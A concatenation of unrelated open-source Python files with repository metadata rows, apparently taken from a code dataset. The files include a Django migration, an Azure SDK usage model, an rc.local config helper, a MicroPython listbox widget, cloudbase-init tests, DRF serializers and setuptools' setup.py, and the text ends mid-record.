('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='ReturnsRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
]
| true | true |
f72ece5f6adcb5d43dae9e1a19b386550d5d1375 | 1,895 | py | Python | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2022-03-30T22:39:15.000Z | 2022-03-30T22:39:15.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Usage(Model):
"""Describes Compute Resource Usage.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar unit: Required. An enum describing the unit of usage measurement.
Default value: "Count" .
:vartype unit: str
:param current_value: Required. The current usage of the resource.
:type current_value: int
:param limit: Required. The maximum permitted usage of the resource.
:type limit: long
:param name: Required. The name of the type of usage.
:type name: ~azure.mgmt.compute.v2016_03_30.models.UsageName
"""
_validation = {
'unit': {'required': True, 'constant': True},
'current_value': {'required': True},
'limit': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'int'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
unit = "Count"
def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
super(Usage, self).__init__(**kwargs)
self.current_value = current_value
self.limit = limit
self.name = name
| 34.454545 | 82 | 0.594195 |
from msrest.serialization import Model
class Usage(Model):
_validation = {
'unit': {'required': True, 'constant': True},
'current_value': {'required': True},
'limit': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'int'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
unit = "Count"
def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
super(Usage, self).__init__(**kwargs)
self.current_value = current_value
self.limit = limit
self.name = name
| true | true |
f72ecf12d2a5bde9b692d56fb3192d8e48a7530b | 1,188 | py | Python | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | # /usr/bin/env python
# coding=utf-8
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
"""
rc.local的配置文件类
"""
def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
file_config=RcLocalFileConfig()):
super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
def add_boot_item(self, cmd, name):
"""
增加启动项
:param name:
:param cmd:
"""
if not name:
raise NameNotValidException("name not valid while adding boot item")
if not cmd:
raise SettingNotValidException("setting not valid while adding boot item")
def add_multi_line_setting(self, name, value):
pass
| 33.942857 | 100 | 0.733165 |
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
file_config=RcLocalFileConfig()):
super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
def add_boot_item(self, cmd, name):
if not name:
raise NameNotValidException("name not valid while adding boot item")
if not cmd:
raise SettingNotValidException("setting not valid while adding boot item")
def add_multi_line_setting(self, name, value):
pass
| true | true |
f72ed12b9dd621b1fa7446c773458608d1e04750 | 6,036 | py | Python | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | # listbox.py Extension to ugui providing the Listbox class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2021 Peter Hinch
# 12 Sep 21 Support for scrolling.
from gui.core.ugui import Widget, display
from gui.core.colors import *
dolittle = lambda *_ : None
# Behaviour has issues compared to touch displays because movement between
# entries is sequential. This can affect the choice in when the callback runs.
# It always runs when select is pressed. See 'also' ctor arg.
class Listbox(Widget):
ON_MOVE = 1 # Also run whenever the currency moves.
ON_LEAVE = 2 # Also run on exit from the control.
# This is used by dropdown.py
@staticmethod
def dimensions(writer, elements, dlines):
# Height of a single entry in list.
entry_height = writer.height + 2 # Allow a pixel above and below text
# Number of displayable lines
dlines = len(elements) if dlines is None else dlines
# Height of control
height = entry_height * dlines + 2
textwidth = max(writer.stringlen(s) for s in elements) + 4
return entry_height, height, dlines, textwidth
def __init__(self, writer, row, col, *,
elements,
dlines=None, width=None, value=0,
fgcolor=None, bgcolor=None, bdcolor=False,
fontcolor=None, select_color=DARKBLUE,
callback=dolittle, args=[], also=0):
e0 = elements[0]
# Check whether elements specified as (str, str,...) or ([str, callback, args], [...)
if isinstance(e0, tuple) or isinstance(e0, list):
self.els = elements # Retain original for .despatch
self.elements = [x[0] for x in elements] # Copy text component
if callback is not dolittle:
raise ValueError('Cannot specify callback.')
self.cb = self.despatch
else:
self.cb = callback
self.elements = elements
if any(not isinstance(s, str) for s in self.elements):
raise ValueError('Invalid elements arg.')
# Calculate dimensions
self.entry_height, height, self.dlines, tw = self.dimensions(
writer, self.elements, dlines)
if width is None:
width = tw # Text width
self.also = also
self.ntop = 0 # Top visible line
if not isinstance(value, int):
value = 0 # Or ValueError?
elif value >= self.dlines: # Must scroll
value = min(value, len(elements) - 1)
self.ntop = value - self.dlines + 1
super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
self.cb_args = args
self.select_color = select_color
self.fontcolor = fontcolor
self._value = value # No callback until user selects
self.ev = value # Value change detection
def show(self):
if not super().show(False): # Clear to self.bgcolor
return
x = self.col
y = self.row
eh = self.entry_height
ntop = self.ntop
dlines = self.dlines
nlines = min(dlines, len(self.elements)) # Displayable lines
for n in range(ntop, ntop + nlines):
text = self.elements[n]
if self.writer.stringlen(text) > self.width: # Clip
font = self.writer.font
pos = 0
nch = 0
for ch in text:
pos += font.get_ch(ch)[2] # width of current char
if pos > self.width:
break
nch += 1
text = text[: nch]
if n == self._value:
display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
else:
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
y += eh
# Draw a vertical line to hint at scrolling
x = self.col + self.width - 2
if ntop:
display.vline(x, self.row, eh - 1, self.fgcolor)
if ntop + dlines < len(self.elements):
y = self.row + (dlines - 1) * eh
display.vline(x, y, eh - 1, self.fgcolor)
def textvalue(self, text=None): # if no arg return current text
if text is None:
return self.elements[self._value]
else: # set value by text
try:
v = self.elements.index(text)
except ValueError:
v = None
else:
if v != self._value:
self.value(v)
return v
def _vchange(self, vnew): # A value change is taking place
# Handle scrolling
if vnew >= self.ntop + self.dlines:
self.ntop = vnew - self.dlines + 1
elif vnew < self.ntop:
self.ntop = vnew
self.value(vnew)
if (self.also & Listbox.ON_MOVE): # Treat as if select pressed
self.do_sel()
def do_adj(self, _, val):
v = self._value
if val > 0:
if v:
self._vchange(v -1)
elif val < 0:
if v < len(self.elements) - 1:
self._vchange(v + 1)
# Callback runs if select is pressed. Also (if ON_LEAVE) if user changes
# list currency and then moves off the control. Otherwise if we have a
# callback that refreshes another control, that second control does not
# track currency.
def do_sel(self): # Select was pushed
self.ev = self._value
self.cb(self, *self.cb_args)
def enter(self):
self.ev = self._value # Value change detection
def leave(self):
if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
self.do_sel()
def despatch(self, _): # Run the callback specified in elements
x = self.els[self()]
x[1](self, *x[2])
| 37.962264 | 102 | 0.567594 |
from gui.core.ugui import Widget, display
from gui.core.colors import *
dolittle = lambda *_ : None
class Listbox(Widget):
ON_MOVE = 1
ON_LEAVE = 2
@staticmethod
def dimensions(writer, elements, dlines):
entry_height = writer.height + 2
dlines = len(elements) if dlines is None else dlines
height = entry_height * dlines + 2
textwidth = max(writer.stringlen(s) for s in elements) + 4
return entry_height, height, dlines, textwidth
def __init__(self, writer, row, col, *,
elements,
dlines=None, width=None, value=0,
fgcolor=None, bgcolor=None, bdcolor=False,
fontcolor=None, select_color=DARKBLUE,
callback=dolittle, args=[], also=0):
e0 = elements[0]
if isinstance(e0, tuple) or isinstance(e0, list):
self.els = elements
self.elements = [x[0] for x in elements]
if callback is not dolittle:
raise ValueError('Cannot specify callback.')
self.cb = self.despatch
else:
self.cb = callback
self.elements = elements
if any(not isinstance(s, str) for s in self.elements):
raise ValueError('Invalid elements arg.')
self.entry_height, height, self.dlines, tw = self.dimensions(
writer, self.elements, dlines)
if width is None:
width = tw
self.also = also
self.ntop = 0
if not isinstance(value, int):
value = 0
elif value >= self.dlines:
value = min(value, len(elements) - 1)
self.ntop = value - self.dlines + 1
super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
self.cb_args = args
self.select_color = select_color
self.fontcolor = fontcolor
self._value = value
self.ev = value
def show(self):
if not super().show(False):
return
x = self.col
y = self.row
eh = self.entry_height
ntop = self.ntop
dlines = self.dlines
nlines = min(dlines, len(self.elements))
for n in range(ntop, ntop + nlines):
text = self.elements[n]
if self.writer.stringlen(text) > self.width:
font = self.writer.font
pos = 0
nch = 0
for ch in text:
pos += font.get_ch(ch)[2]
if pos > self.width:
break
nch += 1
text = text[: nch]
if n == self._value:
display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
else:
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
y += eh
x = self.col + self.width - 2
if ntop:
display.vline(x, self.row, eh - 1, self.fgcolor)
if ntop + dlines < len(self.elements):
y = self.row + (dlines - 1) * eh
display.vline(x, y, eh - 1, self.fgcolor)
def textvalue(self, text=None):
if text is None:
return self.elements[self._value]
else:
try:
v = self.elements.index(text)
except ValueError:
v = None
else:
if v != self._value:
self.value(v)
return v
def _vchange(self, vnew):
if vnew >= self.ntop + self.dlines:
self.ntop = vnew - self.dlines + 1
elif vnew < self.ntop:
self.ntop = vnew
self.value(vnew)
if (self.also & Listbox.ON_MOVE):
self.do_sel()
def do_adj(self, _, val):
v = self._value
if val > 0:
if v:
self._vchange(v -1)
elif val < 0:
if v < len(self.elements) - 1:
self._vchange(v + 1)
def do_sel(self):
self.ev = self._value
self.cb(self, *self.cb_args)
def enter(self):
self.ev = self._value
def leave(self):
if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
self.do_sel()
def despatch(self, _):
x = self.els[self()]
x[1](self, *x[2])
| true | true |
f72ed18097959bb4697efab08240d8e8fb10e5cf | 2,166 | py | Python | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 74 | 2015-01-07T17:03:43.000Z | 2022-02-06T17:08:54.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 26 | 2015-02-13T11:32:05.000Z | 2020-11-13T15:02:03.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 40 | 2015-01-22T17:12:03.000Z | 2021-12-09T20:37:35.000Z | # Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
def setUp(self):
date = "2013-04-04"
content = fake_json_response.get_fake_metadata_json(date)
self.data = content["network_config"]["debian_config"]
def _test_parse_nics(self, no_nics=False):
nics = debiface.parse(self.data)
if no_nics:
self.assertFalse(nics)
return
# check what we've got
nic0 = service_base.NetworkDetails(
fake_json_response.NAME0,
fake_json_response.MAC0.upper(),
fake_json_response.ADDRESS0,
fake_json_response.NETMASK0,
fake_json_response.BROADCAST0,
fake_json_response.GATEWAY0,
fake_json_response.DNSNS0.split()
)
nic1 = service_base.NetworkDetails(
fake_json_response.NAME1,
None,
fake_json_response.ADDRESS1,
fake_json_response.NETMASK1,
fake_json_response.BROADCAST1,
fake_json_response.GATEWAY1,
None
)
self.assertEqual([nic0, nic1], nics)
def test_nothing_to_parse(self):
invalid = [None, "", 324242, ("dasd", "dsa")]
for data in invalid:
self.data = data
self._test_parse_nics(no_nics=True)
def test_parse(self):
self._test_parse_nics()
| 33.84375 | 78 | 0.662973 |
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
def setUp(self):
date = "2013-04-04"
content = fake_json_response.get_fake_metadata_json(date)
self.data = content["network_config"]["debian_config"]
def _test_parse_nics(self, no_nics=False):
nics = debiface.parse(self.data)
if no_nics:
self.assertFalse(nics)
return
nic0 = service_base.NetworkDetails(
fake_json_response.NAME0,
fake_json_response.MAC0.upper(),
fake_json_response.ADDRESS0,
fake_json_response.NETMASK0,
fake_json_response.BROADCAST0,
fake_json_response.GATEWAY0,
fake_json_response.DNSNS0.split()
)
nic1 = service_base.NetworkDetails(
fake_json_response.NAME1,
None,
fake_json_response.ADDRESS1,
fake_json_response.NETMASK1,
fake_json_response.BROADCAST1,
fake_json_response.GATEWAY1,
None
)
self.assertEqual([nic0, nic1], nics)
def test_nothing_to_parse(self):
invalid = [None, "", 324242, ("dasd", "dsa")]
for data in invalid:
self.data = data
self._test_parse_nics(no_nics=True)
def test_parse(self):
self._test_parse_nics()
| true | true |
f72ed31f1f958ed758de28189f10278aab1054fa | 727 | py | Python | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | 6 | 2021-03-19T01:06:25.000Z | 2021-09-22T18:47:10.000Z | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
class Meta:
model = BorrowedBook
fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())
class Meta:
model = get_user_model()
fields = ['borrowed_books']
| 34.619048 | 93 | 0.729023 | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
class Meta:
model = BorrowedBook
fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())
class Meta:
model = get_user_model()
fields = ['borrowed_books']
| true | true |
f72ed3a16a6afdb8aef7e5df2b36580380cf2269 | 6,680 | py | Python | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | 2 | 2017-05-23T12:05:28.000Z | 2018-05-08T20:38:23.000Z | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Distutils setup file, used to install or test 'setuptools'
"""
import io
import os
import sys
import textwrap
# Allow to run setup.py from another directory.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
src_root = None
from distutils.util import convert_path
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
exec(init_file.read(), command_ns)
SETUP_COMMANDS = command_ns['__all__']
import setuptools
scripts = []
def _gen_console_scripts():
yield "easy_install = setuptools.command.easy_install:main"
# Gentoo distributions manage the python-version-specific scripts
# themselves, so those platforms define an environment variable to
# suppress the creation of the version-specific scripts.
var_names = (
'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
)
if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
return
yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
.format(shortver=sys.version[:3]))
console_scripts = list(_gen_console_scripts())
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
long_description = readme_file.read()
package_data = {
'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}
force_windows_specific_files = (
os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
not in (None, "", "0")
)
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
or force_windows_specific_files:
package_data.setdefault('setuptools', []).extend(['*.exe'])
package_data.setdefault('setuptools.command', []).extend(['*.xml'])
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
setup_params = dict(
name="setuptools",
version="20.10.1",
description="Easily download, build, install, upgrade, and uninstall "
"Python packages",
author="Python Packaging Authority",
author_email="distutils-sig@python.org",
long_description=long_description,
keywords="CPAN PyPI distutils eggs package management",
url="https://github.com/pypa/setuptools",
src_root=src_root,
packages=setuptools.find_packages(exclude=['*.tests']),
package_data=package_data,
py_modules=['easy_install'],
zip_safe=True,
entry_points={
"distutils.commands": [
"%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
for cmd in SETUP_COMMANDS
],
"distutils.setup_keywords": [
"eager_resources = setuptools.dist:assert_string_list",
"namespace_packages = setuptools.dist:check_nsp",
"extras_require = setuptools.dist:check_extras",
"install_requires = setuptools.dist:check_requirements",
"tests_require = setuptools.dist:check_requirements",
"setup_requires = setuptools.dist:check_requirements",
"entry_points = setuptools.dist:check_entry_points",
"test_suite = setuptools.dist:check_test_suite",
"zip_safe = setuptools.dist:assert_bool",
"package_data = setuptools.dist:check_package_data",
"exclude_package_data = setuptools.dist:check_package_data",
"include_package_data = setuptools.dist:assert_bool",
"packages = setuptools.dist:check_packages",
"dependency_links = setuptools.dist:assert_string_list",
"test_loader = setuptools.dist:check_importable",
"test_runner = setuptools.dist:check_importable",
"use_2to3 = setuptools.dist:assert_bool",
"convert_2to3_doctests = setuptools.dist:assert_string_list",
"use_2to3_fixers = setuptools.dist:assert_string_list",
"use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
],
"egg_info.writers": [
"PKG-INFO = setuptools.command.egg_info:write_pkg_info",
"requires.txt = setuptools.command.egg_info:write_requirements",
"entry_points.txt = setuptools.command.egg_info:write_entries",
"eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
"namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
"top_level.txt = setuptools.command.egg_info:write_toplevel_names",
"depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
"dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
],
"console_scripts": console_scripts,
"setuptools.installation":
['eggsecutable = setuptools.command.easy_install:bootstrap'],
},
classifiers=textwrap.dedent("""
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.6
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Programming Language :: Python :: 3.5
Topic :: Software Development :: Libraries :: Python Modules
Topic :: System :: Archiving :: Packaging
Topic :: System :: Systems Administration
Topic :: Utilities
""").strip().splitlines(),
extras_require={
"ssl:sys_platform=='win32'": "wincertstore==0.2",
"certs": "certifi==2016.2.28",
},
dependency_links=[
'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
],
scripts=[],
tests_require=[
'setuptools[ssl]',
'pytest>=2.8',
] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
setup_requires=[
] + sphinx + pytest_runner + wheel,
)
if __name__ == '__main__':
dist = setuptools.setup(**setup_params)
| 40.240964 | 123 | 0.655689 |
import io
import os
import sys
import textwrap
os.chdir(os.path.dirname(os.path.abspath(__file__)))
src_root = None
from distutils.util import convert_path
command_ns = {}
init_path = convert_path('setuptools/command/__init__.py')
with open(init_path) as init_file:
exec(init_file.read(), command_ns)
SETUP_COMMANDS = command_ns['__all__']
import setuptools
scripts = []
def _gen_console_scripts():
yield "easy_install = setuptools.command.easy_install:main"
var_names = (
'SETUPTOOLS_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
'DISTRIBUTE_DISABLE_VERSIONED_EASY_INSTALL_SCRIPT',
)
if any(os.environ.get(var) not in (None, "", "0") for var in var_names):
return
yield ("easy_install-{shortver} = setuptools.command.easy_install:main"
.format(shortver=sys.version[:3]))
console_scripts = list(_gen_console_scripts())
readme_file = io.open('README.rst', encoding='utf-8')
with readme_file:
long_description = readme_file.read()
package_data = {
'setuptools': ['script (dev).tmpl', 'script.tmpl', 'site-patch.py']}
force_windows_specific_files = (
os.environ.get("SETUPTOOLS_INSTALL_WINDOWS_SPECIFIC_FILES")
not in (None, "", "0")
)
if (sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt')) \
or force_windows_specific_files:
package_data.setdefault('setuptools', []).extend(['*.exe'])
package_data.setdefault('setuptools.command', []).extend(['*.xml'])
needs_pytest = set(['ptr', 'pytest', 'test']).intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
needs_sphinx = set(['build_sphinx', 'upload_docs', 'release']).intersection(sys.argv)
sphinx = ['sphinx', 'rst.linker>=1.5'] if needs_sphinx else []
needs_wheel = set(['release', 'bdist_wheel']).intersection(sys.argv)
wheel = ['wheel'] if needs_wheel else []
setup_params = dict(
name="setuptools",
version="20.10.1",
description="Easily download, build, install, upgrade, and uninstall "
"Python packages",
author="Python Packaging Authority",
author_email="distutils-sig@python.org",
long_description=long_description,
keywords="CPAN PyPI distutils eggs package management",
url="https://github.com/pypa/setuptools",
src_root=src_root,
packages=setuptools.find_packages(exclude=['*.tests']),
package_data=package_data,
py_modules=['easy_install'],
zip_safe=True,
entry_points={
"distutils.commands": [
"%(cmd)s = setuptools.command.%(cmd)s:%(cmd)s" % locals()
for cmd in SETUP_COMMANDS
],
"distutils.setup_keywords": [
"eager_resources = setuptools.dist:assert_string_list",
"namespace_packages = setuptools.dist:check_nsp",
"extras_require = setuptools.dist:check_extras",
"install_requires = setuptools.dist:check_requirements",
"tests_require = setuptools.dist:check_requirements",
"setup_requires = setuptools.dist:check_requirements",
"entry_points = setuptools.dist:check_entry_points",
"test_suite = setuptools.dist:check_test_suite",
"zip_safe = setuptools.dist:assert_bool",
"package_data = setuptools.dist:check_package_data",
"exclude_package_data = setuptools.dist:check_package_data",
"include_package_data = setuptools.dist:assert_bool",
"packages = setuptools.dist:check_packages",
"dependency_links = setuptools.dist:assert_string_list",
"test_loader = setuptools.dist:check_importable",
"test_runner = setuptools.dist:check_importable",
"use_2to3 = setuptools.dist:assert_bool",
"convert_2to3_doctests = setuptools.dist:assert_string_list",
"use_2to3_fixers = setuptools.dist:assert_string_list",
"use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
],
"egg_info.writers": [
"PKG-INFO = setuptools.command.egg_info:write_pkg_info",
"requires.txt = setuptools.command.egg_info:write_requirements",
"entry_points.txt = setuptools.command.egg_info:write_entries",
"eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
"namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
"top_level.txt = setuptools.command.egg_info:write_toplevel_names",
"depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
"dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
],
"console_scripts": console_scripts,
"setuptools.installation":
['eggsecutable = setuptools.command.easy_install:bootstrap'],
},
classifiers=textwrap.dedent("""
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.6
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Programming Language :: Python :: 3.5
Topic :: Software Development :: Libraries :: Python Modules
Topic :: System :: Archiving :: Packaging
Topic :: System :: Systems Administration
Topic :: Utilities
""").strip().splitlines(),
extras_require={
"ssl:sys_platform=='win32'": "wincertstore==0.2",
"certs": "certifi==2016.2.28",
},
dependency_links=[
'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
],
scripts=[],
tests_require=[
'setuptools[ssl]',
'pytest>=2.8',
] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
setup_requires=[
] + sphinx + pytest_runner + wheel,
)
if __name__ == '__main__':
dist = setuptools.setup(**setup_params)
| true | true |
f72ed504ee5e9ff505fb85110a267350133c3f82 | 1,023 | py | Python | 4_utilization/utilization/urls.py | LIkelion-at-KOREATECH/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
